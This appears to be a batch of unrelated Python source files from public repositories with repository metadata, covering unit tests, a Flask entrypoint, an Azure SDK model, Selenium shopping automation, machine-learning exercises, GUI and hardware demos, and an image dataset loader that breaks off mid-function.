7345727c4eb218c8c13ef8fbdacaf160a942853e
1,975
py
Python
tests/test_silly_sum.py
ratschlab/software-m53
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
[ "MIT" ]
null
null
null
tests/test_silly_sum.py
ratschlab/software-m53
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
[ "MIT" ]
null
null
null
tests/test_silly_sum.py
ratschlab/software-m53
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
[ "MIT" ]
null
null
null
import pytest import riqc.silly_sum as silly_sum import pandas as pd import numpy as np import os from click.testing import CliRunner def path_name(): return os.path.join(os.path.dirname(__file__), 'data', 'numbers.txt') @pytest.fixture def fixed_number_array(): """ Returns some numbers from a file """ path = path_name() with open(path) as f: return np.array([float(l) for l in f]) expected_file_result = 47.8999 def test_silly_sum_simple(): assert 4 == silly_sum.silly_sum(pd.Series([1, 2, 3])) def test_silly_sum_raise_exception_on_illegal_step(): with pytest.raises(ValueError): silly_sum.silly_sum([], -1) def test_silly_sum_stepsize_one(): # to demonstrate handling random data np.random.seed(4200) # import to fix seed, otherwise hard to reproduce data = np.random.uniform(-1.0, 1.0, 10) assert pytest.approx(sum(data)) == silly_sum.silly_sum(data, 1) def test_silly_sum_from_file(): assert pytest.approx(expected_file_result) == silly_sum.silly_sum_from_file( path_name(), 2) @pytest.mark.parametrize("step,expected", [ (1, 49.9999), (2, expected_file_result), (3, 4.3), (4, 46.9), (5, 1.0), (6, 1.0) ]) def test_silly_sum_parametrized(fixed_number_array, step, expected): # demonstrating parametrized testing assert pytest.approx(expected) == silly_sum.silly_sum(fixed_number_array, step) def test_command_line_interface(): """ Test the CLI. """ runner = CliRunner() help_result = runner.invoke(silly_sum.main, ['--help']) assert help_result.exit_code == 0 assert 'Show this message and exit.' in help_result.output def test_end_to_end(): # Integration test runner = CliRunner() result = runner.invoke(silly_sum.main, ['--step', '2', path_name()]) assert pytest.approx(expected_file_result) == float(result.output) assert result.exit_code == 0
26.333333
80
0.674937
6f07b1e6dd52db107d74ed2e6da84f7edff620de
167
py
Python
entrypoint.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
null
null
null
entrypoint.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
null
null
null
entrypoint.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
null
null
null
import os from flask import send_from_directory from app import create_app settings_module = os.getenv('APP_SETTINGS_MODULE') app = create_app(settings_module)
12.846154
50
0.808383
48f52ab0eaed81e6b6dd60c19fd3bdff844586ae
2,591
py
Python
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
jdmartinez36/azure-keyvault-cli-extension
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
[ "MIT" ]
2
2019-06-12T13:44:34.000Z
2020-06-01T13:24:04.000Z
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
jdmartinez36/azure-keyvault-cli-extension
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
[ "MIT" ]
5
2018-04-26T01:14:29.000Z
2021-01-05T00:45:39.000Z
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
jdmartinez36/azure-keyvault-cli-extension
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
[ "MIT" ]
8
2018-04-24T22:52:48.000Z
2021-11-16T06:29:28.000Z
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from .storage_account_item import StorageAccountItem class DeletedStorageAccountItem(StorageAccountItem): """The deleted storage account item containing metadata about the deleted storage account. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Storage identifier. :vartype id: str :ivar resource_id: Storage account resource Id. :vartype resource_id: str :ivar attributes: The storage account management attributes. :vartype attributes: ~azure.keyvault.models.StorageAccountAttributes :ivar tags: Application specific metadata in the form of key-value pairs. :vartype tags: dict[str, str] :param recovery_id: The url of the recovery object, used to identify and recover the deleted storage account. :type recovery_id: str :ivar scheduled_purge_date: The time when the storage account is scheduled to be purged, in UTC :vartype scheduled_purge_date: datetime :ivar deleted_date: The time when the storage account was deleted, in UTC :vartype deleted_date: datetime """ _validation = { 'id': {'readonly': True}, 'resource_id': {'readonly': True}, 'attributes': {'readonly': True}, 'tags': {'readonly': True}, 'scheduled_purge_date': {'readonly': True}, 'deleted_date': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'resource_id': {'key': 'resourceId', 'type': 'str'}, 'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'recovery_id': {'key': 'recoveryId', 'type': 'str'}, 'scheduled_purge_date': {'key': 'scheduledPurgeDate', 'type': 'unix-time'}, 'deleted_date': {'key': 'deletedDate', 'type': 'unix-time'}, } def __init__(self, *, recovery_id: str=None, **kwargs) -> None: super(DeletedStorageAccountItem, self).__init__(, **kwargs) self.recovery_id = recovery_id self.scheduled_purge_date = None self.deleted_date = None
40.484375
83
0.631802
d28cadfb615f40b4aa31a886f41c4ad1f9698e9a
928
py
Python
sn.py
weibk/webauto
f494f8043d05739935d1fc22b941bbc9a7ba75b7
[ "MIT" ]
null
null
null
sn.py
weibk/webauto
f494f8043d05739935d1fc22b941bbc9a7ba75b7
[ "MIT" ]
null
null
null
sn.py
weibk/webauto
f494f8043d05739935d1fc22b941bbc9a7ba75b7
[ "MIT" ]
null
null
null
#!/usr/bin/python3 # encoding='utf-8' # author:weibk # @time:2021/10/22 14:28 from selenium import webdriver from selenium.webdriver.common import keys driver = webdriver.Chrome() driver.get('https://www.suning.com/') driver.maximize_window() driver.find_element_by_xpath('//*[@id="searchKeywords"]').send_keys('小米10') driver.find_element_by_xpath('//*[@id="searchKeywords"]').send_keys( keys.Keys.ENTER) original = driver.current_window_handle driver.implicitly_wait(5) driver.find_elements_by_css_selector('.sellPoint')[3].click() driver.implicitly_wait(5) for i in driver.window_handles: if i != original: driver.switch_to.window(i) driver.find_element_by_xpath('//*[@id="addCart"]').click() driver.implicitly_wait(5) print(driver.title) print(driver.window_handles) driver.switch_to.frame() driver.find_element_by_xpath('//*[@class="go-cart" and ' 'name="cart1_go"]').click()
30.933333
75
0.727371
d2f1aaec135bcb8fa182512c8c594a6aab38e0cc
1,830
py
Python
ng-003/ex1-003/py_ex1/main.py
zaqwes8811/cs-courses
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
[ "Apache-2.0" ]
null
null
null
ng-003/ex1-003/py_ex1/main.py
zaqwes8811/cs-courses
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
[ "Apache-2.0" ]
null
null
null
ng-003/ex1-003/py_ex1/main.py
zaqwes8811/cs-courses
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 """ Model: h = theta_0+theta_1 * x x_m - matrix x - vector Local min: http://book.caltech.edu/bookforum/showthread.php?p=10595 convex function Danger: В NumPy операции с матрицами очень опасные - никакой защиты. Numpy: http://wiki.scipy.org/NumPy_for_Matlab_Users """ import numpy import pylab import numpy as np def warm_up_exercise(): return numpy.eye(5) def load(filename): tmp = numpy.genfromtxt(filename, delimiter=',') return tmp def plot_data(x, y): pylab.plot(x, y, '+') pylab.show() def compute_cost(m_x, y, theta): h = m_x * theta # (AB)^T = B^T * A^T m = m_x.shape[0] j = 1/(2.0 * m) * np.sum(np.square(h - y)) return j def gradient_descent(m_x, y, theta, alpha, num_iterations): theta_local = np.copy(theta) m = m_x.shape[0] for i in range(num_iterations): h = (theta_local.T * m_x.T).T theta_local -= alpha * 1 / m * np.multiply((h - y), m_x).T.sum(axis=1) return theta_local def main(): # Похоже сортировка не нужна - или таки нужна? # J - Это сумма, поэтому скорее всего не важна # # Извлекаем два !вектора! входных данных data = load('mlclass-ex1/ex1data1.txt') x = np.mat(data[:, :1]) y = np.mat(data[:, 1:2]) # Prepare data m = len(y) m_x = numpy.hstack([numpy.ones((m, 1)), x]) # Params - zero point theta = np.mat(numpy.zeros((1, 2))).T # Превращаем в !вектор # cost first iteration j = compute_cost(m_x, y, theta) # just example # Iteration num_iterations = 1500 alpha = 0.01 # Find min theta_opt = gradient_descent(m_x, y, theta, alpha, num_iterations) # Plot data and estimated line line = m_x * theta_opt pylab.plot(x, y, '+', x, line, 'v') pylab.show() if __name__ == '__main__': main()
19.468085
78
0.615301
81b20c0a66d5c408d957a27a29ad5039316e66bb
3,802
py
Python
watchlist_app/tests/test_watchlist_api.py
attachemd/moviedb
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
[ "MIT" ]
null
null
null
watchlist_app/tests/test_watchlist_api.py
attachemd/moviedb
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
[ "MIT" ]
null
null
null
watchlist_app/tests/test_watchlist_api.py
attachemd/moviedb
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
[ "MIT" ]
null
null
null
from unittest import TestCase from datetime import datetime import django from django.urls import reverse from django.utils import timezone from faker import Faker from rest_framework.test import APIClient from rest_framework import status from core.models import WatchListModel from watchlist_app.api.serializers import WatchListSerializer from watchlist_app.tests.factories import WatchListFactory, StreamPlatformFactory MOVIES_URL = reverse('movie_list') def movie_url_pk(pk): return reverse('movie_detail', kwargs={'pk': pk}) def sample_stream_platform(user, name='Main course'): return StreamPlatformFactory() def valid_watch_list(stream_platform_id): return { 'title': faker.company(), 'platform': stream_platform_id, 'storyline': faker.sentence(), 'website': faker.url(), 'active': faker.boolean(), # 'created': datetime.now().strftime("%A, %d. %B %Y %I:%M%p") # 'created': str(timezone.now()) # 'created': datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%fZ") # 'created': datetime.now().strftime("%Y-%m-%d %H:%M[:%S[.uuuuuu]][TZ]") # 'created': datetime.now().strftime("YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]") } faker = Faker() class MoviesApiTests(TestCase): """Test the authorized user tags API""" def setUp(self): self.client = APIClient() self.stream_platform = StreamPlatformFactory() self.valid_watch_list = valid_watch_list(self.stream_platform.id) self.invalid_watch_list = { 'title': '', } def test_retrieve_movies(self): """Test retrieving tags""" WatchListFactory(platform=self.stream_platform) WatchListFactory(platform=self.stream_platform) res = self.client.get(MOVIES_URL) movies = WatchListModel.objects.all() serializer = WatchListSerializer(movies, many=True) self.assertEqual(res.status_code, status.HTTP_200_OK) self.assertEqual(res.data, serializer.data) def test_create_movie_successful(self): """Test creating a new tag""" res = self.client.post(MOVIES_URL, self.valid_watch_list) print("res: ") print(res) # exists = WatchList.objects.filter( # title=self.valid_watch_list['title'], # about=self.valid_watch_list['about'], # website=self.valid_watch_list['website'], # active=self.valid_watch_list['active'], # ).exists() exists = WatchListModel.objects.filter( **self.valid_watch_list ).exists() self.assertTrue(exists) def test_create_movie_invalid(self): """Test creating a new tag with invalid payload""" res = self.client.post(MOVIES_URL, self.invalid_watch_list) self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST) def test_valid_update_movie(self): """ Validated data case """ movie = WatchListFactory(platform=self.stream_platform) response = self.client.put( movie_url_pk(movie.pk), data=self.valid_watch_list ) self.assertEqual(response.status_code, status.HTTP_200_OK) def test_invalid_update_movie(self): """ Invalid data case """ movie = WatchListFactory(platform=self.stream_platform) response = self.client.put( movie_url_pk(movie.pk), data=self.invalid_watch_list ) self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST) def test_delete_movie(self): movie = WatchListFactory(platform=self.stream_platform) response = self.client.delete(movie_url_pk(movie.pk)) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
32.220339
82
0.658601
48402832da134998cb30b07c0cce5f9e6b5f65bd
5,628
py
Python
GUI/class_Bolita.py
AnuTor/UniNeuroLab
5825f440d4663650f038083f3da05229cc5ada4f
[ "Apache-2.0" ]
null
null
null
GUI/class_Bolita.py
AnuTor/UniNeuroLab
5825f440d4663650f038083f3da05229cc5ada4f
[ "Apache-2.0" ]
null
null
null
GUI/class_Bolita.py
AnuTor/UniNeuroLab
5825f440d4663650f038083f3da05229cc5ada4f
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # In[1]: from PyQt5 import QtWidgets from PyQt5.QtWidgets import QApplication, QMainWindow #from PyQt5.QtCore import Qt import numpy as np #import sys #import time global n rango=np.arange(1,26) n= np.random.permutation(rango) ## Creo una segunda Clase st = str("border-radius : 15; border : 1px solid black") #global st class Bolitas(): """ Aqui crearemos cada una de las bolitas del test con sus atributos y sus metodos para trabajarlas como objetos""" def __init__(self, setGeometry , t_Obj = QtWidgets.QPushButton, id = 0, valor = 0, estado = 0, setStyleSheet = st): #super(Bolitas, self).__init__() """ Create a new point at the origin """ self.g1 = setGeometry[0] #Coordenada X self.g2 = setGeometry[1] #Coordenada Y self.g3 = setGeometry[2] #Anchura self.g4 = setGeometry[3] #Altura self.t_Obj= QtWidgets.QPushButton self.id = id self.valor = valor # puede tomar valores del 1 al 25 self.estado = estado # puede tener 3 estados Blanca, Verde o Roja self.setStyleSheet = st ''' def cambioColor(self): """ Este metodo hace que la bolita cambie de estado""" global estado #estado1 global n global tr1 global tr2 global tr3 global tr4 global tr5 print("El estado de la bolita", "es: ") print(estado) estado = estado +1 #numero_estado1=numero_estado1+1 if numero_estado1==n[0]: print("Color Verde") self.b1.setStyleSheet("background-color: green; color: white; border-radius : 15; border : 1px solid green") # Aqui hay que evaluar todas las codiciones relativas de todas las bolitas if tr2==1: self.b2.setStyleSheet("border-radius : 15; border : 1px solid black") tr2=0 if tr3==1: self.b3.setStyleSheet("border-radius : 15; border : 1px solid black") tr3=0 if tr4==1: self.b4.setStyleSheet("border-radius : 15; border : 1px solid black") tr4=0 if tr5==1: self.b5.setStyleSheet("border-radius : 15; border : 1px solid black") tr5=0 elif numero_estado1 != n[0] : print("Color Rojo") self.b1.setStyleSheet("background-color: red; color: white; border-radius : 15; border : 1px solid red") print("El número es mayor al esperado, elija el número siguiente al marcado en verde") numero_estado1=numero_estado1-1 tr1=1 #Levanto el flag de que se presionó una bolita mayor a la esperada else: print("Color Negro") self.b1.setStyleSheet("border-radius : 15; border : 1px solid black") def contarIntentos(self): este metodo cuanta cuantos click se hacen sobre el boton-bolita return num_intentos ''' print("Me parece que cree la primer bolita") #print("Este es n: ", n) i= 0 numero_estado1 = 0 numero_estado2 = 0 numero_estado3 = 0 numero_estado4 = 0 numero_estado5 = 0 numero_estado6 = 0 numero_estado7 = 0 numero_estado8 = 0 numero_estado9 = 0 numero_estado10 = 0 numero_estado11 = 0 numero_estado12 = 0 numero_estado13 = 0 numero_estado14 = 0 numero_estado15 = 0 numero_estado16 = 0 numero_estado17 = 0 numero_estado18 = 0 numero_estado19 = 0 numero_estado20 = 0 numero_estado21 = 0 numero_estado22 = 0 numero_estado23 = 0 numero_estado24 = 0 numero_estado25 = 0 # Creamos una bolita (25-bolitas) ahora como objeto de la clase Bolitas b1 = Bolitas([400,400,30,30], QtWidgets.QPushButton, "1" , n[0], 0, st) b2 = Bolitas([460,480,30,30], QtWidgets.QPushButton, "2" , n[1], 0, st) b3 = Bolitas([250,450,30,30], QtWidgets.QPushButton, "3" , n[2], 0, st) b4 = Bolitas([450,370,30,30] , QtWidgets.QPushButton, "4" , n[3], 0, st) b5 = Bolitas([250,50,30,30], QtWidgets.QPushButton, "5" , n[4], 0, st) b6 = Bolitas([20,470,30,30], QtWidgets.QPushButton, "6" , n[5], 0, st) b7 = Bolitas([380,200,30,30], QtWidgets.QPushButton, "7" , n[6], 0, st) b8 = Bolitas([200,200,30,30] , QtWidgets.QPushButton, "8" , n[7], 0, st) b9 = Bolitas([250,350,30,30] , QtWidgets.QPushButton, "9" , n[8], 0, st) b10 = Bolitas([180,280,30,30] , QtWidgets.QPushButton, "10", n[9], 0, st) b11 = Bolitas([130,420,30,30], QtWidgets.QPushButton, "11", n[10],0, st) b12 = Bolitas([420,130,30,30] , QtWidgets.QPushButton, "12", n[11],0, st) b13 = Bolitas([200,90,30,30] , QtWidgets.QPushButton, "13", n[12],0, st) b14 = Bolitas([330,290,30,30] , QtWidgets.QPushButton, "14", n[13],0, st) b15 = Bolitas([150,370,30,30] , QtWidgets.QPushButton, "15", n[14],0, st) b16 = Bolitas([380,80,30,30], QtWidgets.QPushButton, "16", n[15],0, st) b17 = Bolitas([325,200,30,30], QtWidgets.QPushButton, "17", n[16],0, st) b18 = Bolitas([270,300,30,30] , QtWidgets.QPushButton, "18", n[17],0, st) b19 = Bolitas([20,180,30,30] , QtWidgets.QPushButton, "19", n[18],0, st) b20 = Bolitas([35,320,30,30] , QtWidgets.QPushButton, "20", n[19],0, st) b21 = Bolitas([90,360,30,30] , QtWidgets.QPushButton, "21", n[20],0, st) b22 = Bolitas([95,140,30,30] , QtWidgets.QPushButton, "22", n[21],0, st) b23 = Bolitas([70,220,30,30] , QtWidgets.QPushButton, "23", n[22],0, st) b24 = Bolitas([180,150,30,30], QtWidgets.QPushButton, "24", n[23],0, st) b25 = Bolitas([135,80,30,30] , QtWidgets.QPushButton, "25", n[24],0, st)
34.109091
120
0.617093
48500526498d8d068cf111ac518826fe54debc38
2,850
py
Python
tools/legacy/mw4-erf-converter/convertErf.py
gifted-nguvu/darkstar-dts-converter
aa17a751a9f3361ca9bbb400ee4c9516908d1297
[ "MIT" ]
2
2020-03-18T18:23:27.000Z
2020-08-02T15:59:16.000Z
tools/legacy/mw4-erf-converter/convertErf.py
gifted-nguvu/darkstar-dts-converter
aa17a751a9f3361ca9bbb400ee4c9516908d1297
[ "MIT" ]
5
2019-07-07T16:47:47.000Z
2020-08-10T16:20:00.000Z
tools/legacy/mw4-erf-converter/convertErf.py
gifted-nguvu/darkstar-dts-converter
aa17a751a9f3361ca9bbb400ee4c9516908d1297
[ "MIT" ]
1
2020-03-18T18:23:30.000Z
2020-03-18T18:23:30.000Z
import sys import json import glob import readErf importFilenames = sys.argv[1:] # lower half of mech # hip # (l/r)uleg (u for upper) # (l/r)mleg (m for middle) # (l/r)dleg (d for down) # (l/r)foot # (l/r)ftoe (f for front) # (l/r)btoe (b for back) def getMaxMinY(items): mappedItems = list(map(lambda x: x[1])) minY = min(mappedItems) maxY = max(mappedItems) return (maxY, minY) def getMaxMinX(items): mappedItems = list(map(lambda x: x[0])) minX = min(mappedItems) maxX = max(mappedItems) return (maxY, minY) for importFilename in importFilenames: partName = importFilename.replace(".erf", "").replace(".ERF", "").split("/")[-1] exportFilename = importFilename.replace(".erf", ".obj").replace(".ERF", ".obj") try: print "reading " + importFilename with open(importFilename, "rb") as input_fd: # first get the parsed shape datastructures rawData = input_fd.read() offset, numLod = readErf.readLod(0, rawData) offset, numMeshes = readErf.readNumOfMeshes(offset, rawData) i = 0 meshes = [] while i < numMeshes: offset, numVerts = readErf.readNumOfVerts(offset, rawData) offset, verts = readErf.readVerts(offset, rawData, numVerts) offset, uvVerts = readErf.readUvVerts(offset, rawData) offset, name = readErf.readTextureName(offset, rawData) offset, numFaces = readErf.readNumFaces(offset, rawData) offset, faces = readErf.readFaces(offset, rawData, numFaces) offset, numPlanePoints = readErf.readNumPlanePoints(offset, rawData) offset, planePoints = readErf.readPlanePoints(offset, rawData, numPlanePoints) offset, numNormals = readErf.readNumNormalPoints(offset, rawData) offset, normals = readErf.readNormalPoints(offset, rawData, numNormals) meshes.append((name, verts, uvVerts, faces)); i += 1 print "writing " + exportFilename with open(exportFilename,"w") as shapeFile: vertIndex = 0 for index, mesh in enumerate(meshes): name, verts, uvVerts, faces = mesh shapeFile.write("g " + partName + "-" + str(index) + "\r\n") for vertex in verts: shapeFile.write("\tv " + str(vertex[0]) + " " + str(vertex[1]) + " " + str(vertex[2]) + "\r\n") for face in faces: shapeFile.write("\tf ") for value in face: shapeFile.write(str(value + 1 + vertIndex) + " ") shapeFile.write("\r\n") vertIndex += len(verts) except Exception as e: print e
38.513514
115
0.568421
6f9de8cc9e026d9da1d97f7f0a7b2fd79f1bb7e9
51
py
Python
production/pygsl-0.9.5/gsl_dist/__init__.py
juhnowski/FishingRod
457e7afb5cab424296dff95e1acf10ebf70d32a9
[ "MIT" ]
1
2019-07-29T02:53:51.000Z
2019-07-29T02:53:51.000Z
production/pygsl-0.9.5/gsl_dist/__init__.py
juhnowski/FishingRod
457e7afb5cab424296dff95e1acf10ebf70d32a9
[ "MIT" ]
1
2021-09-11T14:30:32.000Z
2021-09-11T14:30:32.000Z
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/__init__.py
poojavade/Genomics_Docker
829b5094bba18bbe03ae97daf925fee40a8476e8
[ "Apache-2.0" ]
2
2016-12-19T02:27:46.000Z
2019-07-29T02:53:54.000Z
# Just for declaration __all__ = ["gsl_Extension"]
17
27
0.745098
d200b5abad2f5d2d4884a423bd1145df06bca377
763
py
Python
rasa/shared/utils/cli.py
chaneyjd/rasa
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
[ "Apache-2.0" ]
1
2020-10-14T18:09:10.000Z
2020-10-14T18:09:10.000Z
rasa/shared/utils/cli.py
chaneyjd/rasa
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
[ "Apache-2.0" ]
187
2020-02-25T16:07:06.000Z
2022-03-01T13:42:41.000Z
rasa/shared/utils/cli.py
chaneyjd/rasa
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
[ "Apache-2.0" ]
null
null
null
import sys from typing import Any, Text, NoReturn import rasa.shared.utils.io def print_color(*args: Any, color: Text): print(rasa.shared.utils.io.wrap_with_color(*args, color=color)) def print_success(*args: Any): print_color(*args, color=rasa.shared.utils.io.bcolors.OKGREEN) def print_info(*args: Any): print_color(*args, color=rasa.shared.utils.io.bcolors.OKBLUE) def print_warning(*args: Any): print_color(*args, color=rasa.shared.utils.io.bcolors.WARNING) def print_error(*args: Any): print_color(*args, color=rasa.shared.utils.io.bcolors.FAIL) def print_error_and_exit(message: Text, exit_code: int = 1) -> NoReturn: """Print error message and exit the application.""" print_error(message) sys.exit(exit_code)
23.84375
72
0.731324
fb50513aa1e6c67b5d034dcff900c7f890e63cd9
519
py
Python
examples/lcd.py
Elecrow-RD/Raspberry-Pi-Starter-Kit
9adad7bfb403a697119bf80bbc2290bc3832750d
[ "MIT" ]
1
2020-08-11T23:39:23.000Z
2020-08-11T23:39:23.000Z
examples/lcd.py
Elecrow-RD/Raspberry-Pi-Starter-Kit
9adad7bfb403a697119bf80bbc2290bc3832750d
[ "MIT" ]
null
null
null
examples/lcd.py
Elecrow-RD/Raspberry-Pi-Starter-Kit
9adad7bfb403a697119bf80bbc2290bc3832750d
[ "MIT" ]
1
2020-08-05T18:30:45.000Z
2020-08-05T18:30:45.000Z
#!/usr/bin/python # -*- coding: utf-8 -*- import sys import time import Adafruit_CharLCD as LCD # Define LCD column and row size for 16x2 LCD. lcd_columns = 16 lcd_rows = 2 # Initialize the LCD using the pins lcd = LCD.Adafruit_CharLCDBackpack(address=0x21) try: while True: # Turn backlight on lcd.set_backlight(0) # clean the LCD screen lcd.clear() lcd.message('Hello world') time.sleep(5) except KeyboardInterrupt: # Turn the screen off lcd.clear() lcd.set_backlight(1)
19.961538
48
0.687861
f7cfec42dd43a1a13af0bbed528255972ca7cb62
11,408
py
Python
2DNet/src/dataset/dataset.py
BhaveshJP25/RSNA
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
[ "MIT" ]
null
null
null
2DNet/src/dataset/dataset.py
BhaveshJP25/RSNA
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
[ "MIT" ]
null
null
null
2DNet/src/dataset/dataset.py
BhaveshJP25/RSNA
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
[ "MIT" ]
null
null
null
import torch.utils.data as data import torch import albumentations import cv2 import numpy as np import random import math from settings import train_png_dir def generate_transforms(image_size): IMAGENET_SIZE = image_size train_transform = albumentations.Compose([ albumentations.Resize(IMAGENET_SIZE, IMAGENET_SIZE), albumentations.Normalize(mean=(0.456, 0.456, 0.456), std=(0.224, 0.224, 0.224), max_pixel_value=255.0, p=1.0) ]) val_transform = albumentations.Compose([ albumentations.Resize(IMAGENET_SIZE, IMAGENET_SIZE), albumentations.Normalize(mean=(0.456, 0.456, 0.456), std=(0.224, 0.224, 0.224), max_pixel_value=255.0, p=1.0) ]) return train_transform, val_transform def generate_random_list(length): new_list = [] for i in range(length): if i <= length/2: weight = int(i/4) else: weight = int((length - i)/4) weight = np.max([1, weight]) new_list += [i]*weight return new_list class RSNA_Dataset_train_by_study_context(data.Dataset): def __init__(self, df = None, name_list = None, transform = None ): self.df = df[df['study_instance_uid'].isin(name_list)] self.name_list = name_list self.transform = transform def __getitem__(self, idx): study_name = self.name_list[idx % len(self.name_list)] study_train_df = self.df[self.df['study_instance_uid']==study_name] print(study_train_df.head()) study_index = random.choice(generate_random_list(study_train_df.shape[0]-1)) slice_id = study_name + '_' + str(study_index) filename = study_train_df[study_train_df['slice_id']==slice_id]['filename'].values[0] if study_index == (study_train_df.shape[0]-1): filename_up = filename else: slice_id_up = study_name + '_' + str(study_index+1) filename_up = study_train_df[study_train_df['slice_id']==slice_id_up]['filename'].values[0] if study_index == 0: filename_down = filename else: slice_id_down = study_name + '_' + str(study_index-1) filename_down = study_train_df[study_train_df['slice_id']==slice_id_down]['filename'].values[0] # print(train_png_dir) # print("\n") # print(filename) image = cv2.imread(train_png_dir + filename, 0) image = cv2.resize(image, (512, 512)) image_up = cv2.imread(train_png_dir + filename_up, 0) image_up = cv2.resize(image_up, (512, 512)) image_down = cv2.imread(train_png_dir + filename_down, 0) image_down = cv2.resize(image_down, (512, 512)) image_cat = np.concatenate([image_up[:,:,np.newaxis], image[:,:,np.newaxis], image_down[:,:,np.newaxis]],2) label = torch.FloatTensor(study_train_df[study_train_df['filename']==filename].loc[:, 'any': 'subdural'].values) if random.random() < 0.5: image_cat = cv2.cvtColor(image_cat, cv2.COLOR_BGR2RGB) image_cat = aug_image(image_cat, is_infer=False) if self.transform is not None: augmented = self.transform(image=image_cat) image_cat = augmented['image'].transpose(2, 0, 1) # print(label) # exit(0) return image_cat, label def __len__(self): return len(self.name_list) * 4 class RSNA_Dataset_val_by_study_context(data.Dataset): def __init__(self, df = None, name_list = None, transform = None ): self.df = df self.name_list = name_list self.transform = transform def __getitem__(self, idx): filename = self.name_list[idx % len(self.name_list)] filename_train_df = self.df[self.df['filename']==filename] study_name = filename_train_df['study_instance_uid'].values[0] study_index = int(filename_train_df['slice_id'].values[0].split('_')[-1]) study_train_df = self.df[self.df['study_instance_uid']==study_name] if study_index == (study_train_df.shape[0]-1): filename_up = filename else: slice_id_up = study_name + '_' + str(study_index+1) filename_up = study_train_df[study_train_df['slice_id']==slice_id_up]['filename'].values[0] if study_index == 0: filename_down = filename else: slice_id_down = study_name + '_' + str(study_index-1) filename_down = study_train_df[study_train_df['slice_id']==slice_id_down]['filename'].values[0] image = cv2.imread(train_png_dir + filename, 0) image = cv2.resize(image, (512, 512)) image_up = cv2.imread(train_png_dir + filename_up, 0) image_up = cv2.resize(image_up, (512, 512)) image_down = cv2.imread(train_png_dir + filename_down, 0) image_down = cv2.resize(image_down, (512, 512)) image_cat = np.concatenate([image_up[:,:,np.newaxis], image[:,:,np.newaxis], image_down[:,:,np.newaxis]],2) label = torch.FloatTensor(study_train_df[study_train_df['filename']==filename].loc[:, 'any':'subdural'].values) image_cat = aug_image(image_cat, is_infer=True) if self.transform is not None: augmented = self.transform(image=image_cat) image_cat = augmented['image'].transpose(2, 0, 1) return image_cat, label def __len__(self): return len(self.name_list) def randomHorizontalFlip(image, u=0.5): if np.random.random() < u: image = cv2.flip(image, 1) return image def randomVerticleFlip(image, u=0.5): if np.random.random() < u: image = cv2.flip(image, 0) return image def randomRotate90(image, u=0.5): if np.random.random() < u: image[:,:,0:3] = np.rot90(image[:,:,0:3]) return image #===================================================origin============================================================= def random_cropping(image, ratio=0.8, is_random = True): height, width, _ = image.shape target_h = int(height*ratio) target_w = int(width*ratio) if is_random: start_x = random.randint(0, width - target_w) start_y = random.randint(0, height - target_h) else: start_x = ( width - target_w ) // 2 start_y = ( height - target_h ) // 2 zeros = image[start_y:start_y+target_h,start_x:start_x+target_w,:] zeros = cv2.resize(zeros ,(width,height)) return zeros def cropping(image, ratio=0.8, code = 0): height, width, _ = image.shape target_h = int(height*ratio) target_w = int(width*ratio) if code==0: start_x = ( width - target_w ) // 2 start_y = ( height - target_h ) // 2 elif code == 1: start_x = 0 start_y = 0 elif code == 2: start_x = width - target_w start_y = 0 elif code == 3: start_x = 0 start_y = height - target_h elif code == 4: start_x = width - target_w start_y = height - target_h elif code == -1: return image zeros = image[start_y:start_y+target_h,start_x:start_x+target_w,:] zeros = cv2.resize(zeros ,(width,height)) return zeros def random_erasing(img, probability=0.5, sl=0.02, sh=0.4, r1=0.3): if random.uniform(0, 1) > probability: return img for attempt in range(100): area = img.shape[0] * img.shape[1] target_area = random.uniform(sl, sh) * area aspect_ratio = random.uniform(r1, 1 / r1) h = int(round(math.sqrt(target_area * aspect_ratio))) w = int(round(math.sqrt(target_area / aspect_ratio))) if w < img.shape[1] and h < img.shape[0]: x1 = random.randint(0, img.shape[0] - h) y1 = random.randint(0, img.shape[1] - w) if img.shape[2] == 3: img[x1:x1 + h, y1:y1 + w, :] = 0.0 else: print('!!!!!!!! random_erasing dim wrong!!!!!!!!!!!') return return img return img def randomShiftScaleRotate(image, shift_limit=(-0.0, 0.0), scale_limit=(-0.0, 0.0), 